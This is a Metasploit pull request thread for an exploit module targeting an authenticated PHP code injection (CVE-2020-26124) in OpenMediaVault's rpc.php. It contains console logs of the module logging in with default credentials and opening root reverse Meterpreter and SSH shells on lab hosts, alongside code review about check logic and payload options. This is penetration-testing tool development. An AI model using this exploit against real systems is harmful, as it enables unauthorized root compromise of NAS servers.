Patch 1
rapid7/metasploit-framework pull request #14241
Opened 2020-10-08 14:50 UTC by stasinopoulos

This module exploits an authenticated PHP code injection vulnerability found in openmediavault before 4.1.36 and 5.x before 5.5.12  inclusive in the `sortfield` POST parameter of `rpc.php` page, because json_encode_safe is not used in `config/databasebackend.inc`. Successful exploitation allows arbitrary command execution on the underlying operating system as `root`.

**Usage Example**
```
msf6 > use exploit/unix/webapp/openmediavault_rpc_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > show options

Module options (exploit/unix/webapp/openmediavault_rpc_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  openmediavault   yes       Password to login with
   HttpUsername  admin            yes       User to login with
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         80               yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT       8080             yes       The local port to listen on.
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                        no        The URI to use for this exploit (default is random)
   VHOST                          no        HTTP server virtual host

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (Linux Dropper)

msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set rhosts 192.168.56.108
rhosts => 192.168.56.108
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set lhost 192.168.56.105
lhost => 192.168.56.105
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > exploit

[*] Started reverse TCP handler on 192.168.56.105:4444
[*] 192.168.56.108:80 - Authenticating using "admin:openmediavault" credentials...
[+] 192.168.56.108:80 - Authenticated successfully.
[+] 192.168.56.108:80 - OpenMediaVault version 5.5.11 identified.
[*] 192.168.56.108:80 - Sending payload (150 bytes)...
[*] Sending stage (976712 bytes) to 192.168.56.108
[*] Meterpreter session 1 opened (192.168.56.105:4444 -> 192.168.56.108:38508) at 2020-10-07 01:16:01 -0400
[*] Command Stager progress - 100.00% done (799/799 bytes)

meterpreter > sysinfo
Computer     : 192.168.56.108
OS           : Debian 10.5 (Linux 5.7.0-0.bpo.2-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > shell
Process 1499 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)
```

2020-10-08 15:16 UTC, bcoles requested changes, later dismissed

2020-10-08 15:16 UTC, bcoles commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +    if res.code == 200
Nothing is returned if `res.code` is not `200`. Also, rather than wrap most of the method within this conditional branch, it would make more sense to check if the code is not `200` and bail out with `CheckCode::Safe` (optionally with an additional appropriate message).

2020-10-08 15:16 UTC, bcoles commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +      else
Redundant `else` after `return`.

2020-10-08 15:16 UTC, bcoles commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +    print_error('Rex::ConnectionError caught in check(), could not connect to the target.')
```suggestion
    print_error('Rex::ConnectionError caught in exploit(), could not connect to the target.')
```

2020-10-08 15:16 UTC, bcoles commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +    if res.code == 200
Rather than wrap most of the method within this conditional branch, it would make more sense to check if the code is not `200` and bail out with `Failure::NotVulnerable` and an appropriate error message.

2020-10-08 15:16 UTC, bcoles commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +      print_error("No response was received from #{peer} whilst in exploit(), check it is online and the target port is open!")
As per comments in the `check` method, this is a lie, as `nil` returned from `login` implies either connection failure or login failure. This is complicated by the login method effectively "returning" two values - a return code and a cookie via the `@cookie` instance variable.

This requires further review. One possible alternative is to check for `@cookie` as well as, or instead of, the return value.

2020-10-08 15:16 UTC, bcoles commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +    return res
The way this function is used implies that a `nil` response is expected to indicate login failure or connection failure.

These conditional branches are inconsistent and complicates checking whether the method worked as intended. For example, a `401` response will cause this method to return `res` (a HTTP response object), which implies that authentication was successful.

2020-10-08 15:16 UTC, bcoles commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +      @cookie = res.get_cookies
This requires further validation. The cookies returned should be checked to ensure that the cookie name is expected. Otherwise, this method will presume authentication was successful for every web server which happens to response with a `200` response code and any cookie.

Ideally, a portion of the response body should also be compared to verify successful authentication, if possible.

2020-10-08 17:52 UTC, stasinopoulos commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +      }",
Done.

2020-10-09 05:28 UTC, stasinopoulos commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +      else
Done.

2020-10-09 05:34 UTC, stasinopoulos commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +      }"
Done.

2020-10-09 08:58 UTC, stasinopoulos commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +    if res.code == 200
Updated, please check.

2020-10-09 08:58 UTC, stasinopoulos commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +    if res.code == 200
Updated, please check.

2020-10-09 08:58 UTC, stasinopoulos commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +      print_error("No response was received from #{peer} whilst in exploit(), check it is online and the target port is open!")
Updated, please check.

2020-10-09 08:58 UTC, stasinopoulos commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +    return res
Updated, please check.

2020-10-09 08:59 UTC, stasinopoulos commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +      @cookie = res.get_cookies
Updated, please check.

2020-10-09 09:19 UTC, bcoles commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +      return CheckCode::Unknown("No response was received from #{peer} whilst in exploit(), check it is online and the target port is open!")
```suggestion
      fail_with(Failure::NoAccess, 'Authentication failed')
```

2020-10-09 09:19 UTC, bcoles commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +      return CheckCode::Safe
```suggestion
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
```

2020-10-09 09:26 UTC, bcoles commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +      print_error("No response was received from #{peer} whilst in exploit(), check it is online and the target port is open!")
The logic surrounding `login` and `check` is still a bit of a mess.

The `check` function calls `login` which makes use of `print_*` methods and `fail_with` method. These are not permitted within a `check` method. See [How to write a check() method](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-check()-method).

At first glance, it appears as though the `login` method could be modified to return cookies upon successful authentication, or `nil` upon failure. Another alternative is to return a `CheckCode` from within `login`.

This was the final remaining issue from my review. I don't have time to review further. Someone else may need to offer guidance here.

2020-10-09 11:09 UTC, stasinopoulos commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +      print_error("No response was received from #{peer} whilst in exploit(), check it is online and the target port is open!")
Updated, thanks for your review and guidance :) .

2020-10-10 15:16 UTC, stasinopoulos commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +      print_error("No response was received from #{peer} whilst in exploit(), check it is online and the target port is open!")
Hello @bcoles, do i need to update/fix something else regarding that PR?

2020-10-10 15:17 UTC, stasinopoulos commented
Hello @bcoles, do i need to update/fix something else regarding that PR?

2020-10-10 15:47 UTC, bcoles commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +    end
`fail_with` is preferred. Also, redundant `else` after return.

```suggestion
    if @cookie.nil?
      fail_with(Failure::NoAccess, 'Authentication failed')
    end

    print_good("#{peer} - Successfully authenticated with OpenMediaVault.")
```

Also, is there any value in checking the return value from `login` above ? Presumably checking for `@cookie` would be sufficient?

2020-10-10 16:02 UTC, stasinopoulos commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +    end
In my opinion, checking for @`cookie` would be sufficient, but if you have something else to propose (i.e. an extra check), please let me know.

2020-10-10 16:14 UTC, bcoles commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +    end
> 
> 
> In my opinion, checking for `@cookie` would be sufficient, but if you have something else to propose (i.e. an extra check), please let me know.

I'm suggesting less checks.

Rather than check `login` then check `@cookie` - given that they are effectively the same and that the error message for both is `authentication failed` - why not simply check only `@cookie` ?

2020-10-10 16:35 UTC, stasinopoulos commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +    end
So something like the following would be ok: 

```  
def check
    login(user, pass)

    if @cookie.nil?
      vprint_error("#{peer} - Failed to authenticate with OpenMediaVault.")
      return Exploit::CheckCode::Unknown
    end
```

```  
def exploit
    login(user, pass)

    if @cookie.nil?
      fail_with(Failure::NoAccess, 'Authentication failed')
    end
```

2020-10-12 18:29 UTC, stasinopoulos commented
Hello @bcoles do you think that the module is ok for the merge?

2020-11-03 22:43 UTC, gwillcox-r7 commented
Was able to successfully get this working, here were the test results:

```
msf6 > use exploit/unix/webapp/openmediavault_rpc_rce 
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > show options

Module options (exploit/unix/webapp/openmediavault_rpc_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   openmediavault   yes       The OpenMediaVault password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The URI path of the OpenMediaVault installation
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       The OpenMediaVault username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Linux Dropper)


msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set RHOSTS 172.25.62.100
RHOSTS => 172.25.62.100
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set lhost 172.25.58.75 
lhost => 172.25.58.75
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > exploit

[*] Started reverse TCP handler on 172.25.58.75:4444 
[*] 172.25.62.100:80 - Authenticating with OpenMediaVault using admin:openmediavault...
[+] 172.25.62.100:80 - Successfully authenticated with OpenMediaVault.
[*] 172.25.62.100:80 - Trying to detect if target is running a supported version of OpenMediaVault.
[+] 172.25.62.100:80 - Identified OpenMediaVault version 5.5.11.
[*] 172.25.62.100:80 - Sending payload (150 bytes)...
[*] Sending stage (976712 bytes) to 172.25.62.100
[*] Meterpreter session 1 opened (172.25.58.75:4444 -> 172.25.62.100:59516) at 2020-11-03 16:41:55 -0600
[*] Command Stager progress - 100.00% done (799/799 bytes)

meterpreter > sysinfo
Computer     : openmediavault.local
OS           : Debian 10.5 (Linux 5.7.0-0.bpo.2-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid
Server username: root @ openmediavault (uid=0, gid=0, euid=0, egid=0)
meterpreter > get
get_timeouts  getenv        getlwd        getpid        getproxy      getuid        getwd         
meterpreter > getwd
/
meterpreter > shell
Process 1313 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/
uname -a
Linux openmediavault 5.7.0-0.bpo.2-amd64 #1 SMP Debian 5.7.10-1~bpo10+1 (2020-07-30) x86_64 GNU/Linux
```

2020-11-04 00:29 UTC, gwillcox-r7 requested changes
Overall looking pretty good but had a few things to go through and review. About half of it is simple grammar and spelling, and the other half are some small points of note r.e various coding bits and pieces that deserve some small edits.

2020-11-04 00:29 UTC, gwillcox-r7 commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +    vprint_status("#{peer} - Verifying remote code execution by attempting to execute 'usleep()'.")
This seems like something you would want to let the users know you are doing, especially considering that this will make it appear that the module is now frozen for no reason for a few seconds.

2020-11-04 00:29 UTC, gwillcox-r7 commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +      vprint_error("#{peer} - Connection failed whilst trying to perform the code injection.")
Eh again probably want to let the user know why the target was only marked as Detected.

2020-11-04 00:29 UTC, gwillcox-r7 commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +    vprint_error("#{peer} - Rex::ConnectionError caught in check(), could not connect to the target.")
Again this is a failure case, want to let user's know why we failed so they are aware of what went on and aren't getting failures with no info behind it.

2020-11-04 00:29 UTC, gwillcox-r7 commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +    vprint_error("#{peer} - Response wasn't received within the expected period of time.")
Again this is a failure case, want to let user's know why we failed so they are aware of what went on and aren't getting failures with no info behind it.

2020-11-04 00:29 UTC, gwillcox-r7 commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +      vprint_good("#{peer} - Response received after #{diff} seconds.")
Probably would be good to inform the user of this via `print_good` rather than hiding this behind the `VERBOSE` flag.

2020-11-08 07:39 UTC, stasinopoulos commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +    end
Hey @gwillcox-r7 could you please provide me with an example regrading `AutoCheck`?

2020-11-08 07:47 UTC, bcoles commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +    end
Add `prepend Msf::Exploit::Remote::AutoCheck` at the top of your mixin imports (`include ..` lines at the top of the file).

This will make the `exploit` method call `check` immediately before proceeding with exploitation. This way you can remove all checking code from the `exploit` method which saves on code duplication.

If the target is found to be not vulnerable, exploitation will not continue unless the user sets `set ForceExploit true`.

2020-11-08 07:51 UTC, stasinopoulos commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +    end
Cool! Thanks @bcoles for your prompt response!

2020-11-08 08:09 UTC, stasinopoulos commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +    return version
I think we should add check for version "3.0.1" due to https://www.openmediavault.org/?paged=2&page_id=1271

```
elsif  version_gemmed >= Gem::Version.new('3.0.0') && version_gemmed < Gem::Version.new('3.0.1')
    return version
```

2020-11-08 21:48 UTC, gwillcox-r7 commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +    return version
Yep that looks good @stasinopoulos and good spotting I missed that one. Feel free to go ahead and commit that code 👍

2020-11-09 14:58 UTC, gwillcox-r7 commented
@stasinopoulos So one quick question but was the 3.X update only released because the 3.X branch is supported? I'm just thinking if we need to update the docs accordingly at all as it seems like the original statement was all versions prior to 4.1.36 were affected, but if I look closer each release had its own branch and the first branch was 0.2 which was last updated in 2011, so just wanted to do a double check that the vulnerability did indeed reach all the way back then.

Otherwise going to look over the rest of the edits so long now and double check all the fixes look good, will let you know if anything else needs more info or edits.

2020-11-09 15:30 UTC, gwillcox-r7 commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +    print_error('Caught a Rex::ConnectionError in login() method. Connection failed.')
`in the login() method.` would make more gramatical sense. Missing the linking `the` in this sentence.

2020-11-09 15:30 UTC, gwillcox-r7 commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +    fail_with(Failure::Unreachable, 'Connection failed.')
Seeing as you have been stating where the exception was thrown for other cases of `ConnectionError` would it not be good to state something like `Rex::ConnectionError caught whilst attempting to execute our desired command, could not connect to the target.`

2020-11-09 15:30 UTC, gwillcox-r7 commented on modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
> +      return CheckCode::Detected
Reopened this as I thought the `vprint_*` methods should be used but after talking with the team it seems either are fine, just so long as no exceptions are raised during the `check()` method's operation as this will cause errors.

2020-11-09 16:57 UTC, gwillcox-r7 commented
@stasinopoulos Alright this looks just about ready to land. A few comments from the previous review were not addressed in full so I'll be applying some updates now to get them resolved, then retesting to make sure the exploit still works as expected.

2020-11-09 17:41 UTC, gwillcox-r7 approved these changes

2020-11-09 17:45 UTC, gwillcox-r7 commented
Right so there is one thing that I do find a little odd here and that is the option r.e the in memory payload dropper. For some reason its returning me shells multiple times for one exploit attempt and even if I terminate one shell another one will just pop up in its place which isn't great for pentesting scenarios:

```
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set TARGET 1
TARGET => 1
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > run

[-] Handler failed to bind to 172.29.95.98:22
[-] Handler failed to bind to 0.0.0.0:22
[-] Exploit failed: NoMethodError undefined method `on_client_connect_proc=' for nil:NilClass
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > show options

Module options (exploit/unix/webapp/openmediavault_rpc_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   openmediavault   yes       The OpenMediaVault password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.29.90.121    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The URI path of the OpenMediaVault installation
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       The OpenMediaVault username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_ssh):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.29.95.98     yes       The listen address (an interface may be specified)
   LPORT  22               yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Automatic (Unix In-Memory)


msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set LPORT 9988
LPORT => 9988
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > run

[*] Started SSH reverse handler on ssh://172.29.95.98:9988
[*] Executing automatic check (disable AutoCheck to override)
[*] 172.29.90.121:80 - Authenticating with OpenMediaVault using admin:openmediavault...
[+] 172.29.90.121:80 - Successfully authenticated with OpenMediaVault using admin:openmediavault.
[*] 172.29.90.121:80 - Trying to detect if target is running a supported version of OpenMediaVault.
[+] 172.29.90.121:80 - Identified OpenMediaVault version 5.5.11.
[*] 172.29.90.121:80 - Verifying remote code execution by attempting to execute 'usleep()'.
[+] 172.29.90.121:80 - Response received after 6 seconds.
[+] The target is vulnerable.
[*] 172.29.90.121:80 - Sending payload (158 bytes)...
[*] SSH command shell session 2 opened (127.0.0.1 -> 127.0.0.1) at 2020-11-09 11:28:39 -0600

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
uname -a
Linux openmediavault 5.7.0-0.bpo.2-amd64 #1 SMP Debian 5.7.10-1~bpo10+1 (2020-07-30) x86_64 GNU/Linux
pwd
/
^C
Abort session 2? [y/N]  N
[*] Aborting foreground process in the shell session
^C
Abort session 2? [y/N]  y

[*] 172.29.90.121 - SSH command shell session 2 closed.  Reason: User exit
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > [*] SSH command shell session 3 opened (127.0.0.1 -> 127.0.0.1) at 2020-11-09 11:42:59 -0600

msf6 exploit(unix/webapp/openmediavault_rpc_rce) > sessions -i 3
[*] Starting interaction with 3...

id
uid=0(root) gid=0(root) groups=0(root)
exit
[*] 172.29.90.121 - SSH command shell session 3 closed.
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > [*] SSH command shell session 4 opened (127.0.0.1 -> 127.0.0.1) at 2020-11-09 11:43:09 -0600

msf6 exploit(unix/webapp/openmediavault_rpc_rce) > sessions -i 4
[*] Starting interaction with 4...

id  
uid=0(root) gid=0(root) groups=0(root)
exit
[*] 172.29.90.121 - SSH command shell session 4 closed.
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > [*] SSH command shell session 5 opened (127.0.0.1 -> 127.0.0.1) at 2020-11-09 11:43:23 -0600

msf6 exploit(unix/webapp/openmediavault_rpc_rce) > sessions -i 5
[*] Starting interaction with 5...

id
uid=0(root) gid=0(root) groups=0(root)
exit
[*] 172.29.90.121 - SSH command shell session 5 closed.
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > Interrupt: use the 'exit' command to quit
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > [*] SSH command shell session 6 opened (127.0.0.1 -> 127.0.0.1) at 2020-11-09 11:43:34 -0600

msf6 exploit(unix/webapp/openmediavault_rpc_rce) > jobs

Jobs
====

No active jobs.

msf6 exploit(unix/webapp/openmediavault_rpc_rce) > sessions -i 6
[*] Starting interaction with 6...

exit
[*] 172.29.90.121 - SSH command shell session 6 closed.
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > [*] SSH command shell session 7 opened (127.0.0.1 -> 127.0.0.1) at 2020-11-09 11:43:52 -0600
```

2020-11-09 18:10 UTC, gwillcox-r7 commented
Alright so looks like the above issue is the last one to fix. Going to upload the rest of my changes so long though so that at least the other issues are addressed, but will need to figure out how to resolve that repeated session issue or, worse comes to worse, remove this option until we can appropriately address it.

2020-11-09 22:43 UTC, jmartin-r7 commented
@msjenkins-r7 test this please.

2020-11-24 18:39 UTC, gwillcox-r7 commented
@stasinopoulos Going to take a look and see if I can't quickly figure out what the issue is with the payload but I think what we will most likely do is land this without support for the Unix In-Memory payload, and then add support for this in later on once this issue has been resolved as an enhancement. I'd rather not delay the release of the module over an issue with the payload when the rest of the code is working as expected.

2020-11-24 19:38 UTC, gwillcox-r7 commented
Alright yeah considering most of the other payloads don't work at all with the exception of `cmd/unix/reverse_openssl` which connects back but doesn't return a working shell, I'm going to go ahead and remove the in memory payload option until this can be cleaned up. Will land this PR shortly. Thanks for your patience and contribution @stasinopoulos!

2020-11-24 19:43 UTC, merged

2020-11-24 19:45 UTC, gwillcox-r7 commented
Fixes to remove support for the in memory option were ninja edited in with commit https://github.com/rapid7/metasploit-framework/commit/e0a8aff72b12f77752126f0d040b5008b5590ebc

2020-11-24 19:49 UTC, gwillcox-r7 commented
# Release Notes
A new module has been added in to exploit CVE-2020-26124, an authenticated PHP code injection vulnerability in the `sortfield` POST parameter of the `rpc.php` page in all OpenMediaVault version prior to 4.1.36 and well as all 5.x versions prior to 5.5.12.
Successful exploitation allows arbitrary command execution on the underlying operating system as the `root` user.

2021-02-03 01:55 UTC, hackercoolmagz commented
While running check command, I am getting below output. The same happens when I execute the module. Can anybody help me where it went wrong . 

check

[*] 192.168.36.172:80 - Authenticating with OpenMediaVault using admin:kiractf...
[+] 192.168.36.172:80 - Successfully authenticated with OpenMediaVault using admin:kiractf.
[*] 192.168.36.172:80 - Trying to detect if target is running a supported version of OpenMediaVault.
[+] 192.168.36.172:80 - Identified OpenMediaVault version 5.5.11.
[*] 192.168.36.172:80 - Verifying remote code execution by attempting to execute 'usleep()'.
[-] 192.168.36.172:80 - Response wasn't received within the expected period of time.
[*] 192.168.36.172:80 - The target is not exploitable.

2021-02-03 02:42 UTC, bcoles commented
> 
> Can anybody help me where it went wrong .

The response wasn't received within the expected period of time indicating that the `usleep()` call did not work. Perhaps it was not executed (patched?, WAF? IPS?). You could try running the exploit anyway, although you will need to disable autocheck.

2021-02-03 10:11 UTC, hackercoolmagz commented
This is my output  running the module after disabling autocheck. If this version is patched, can you tell me where can i get a unpatched one.

msf6 exploit(unix/webapp/openmediavault_rpc_rce) > run

[*] Started reverse TCP handler on 192.168.36.171:4444 
[!] AutoCheck is disabled, proceeding with exploitation
[*] 192.168.36.172:80 - Sending payload (150 bytes)...
[*] Command Stager progress - 100.00% done (799/799 bytes)
[*] Exploit completed, but no session was created.

2021-02-03 10:29 UTC, bcoles commented
> If this version is patched, can you tell me where can i get a unpatched one.

There's a link to download the software in the module documentation.

https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/unix/webapp/openmediavault_rpc_rce.md

For debugging purposes, you can `set httptrace true` to view the HTPT requests and responses from the server.

2021-02-03 16:40 UTC, hackercoolmagz commented
Thank you. It's working now.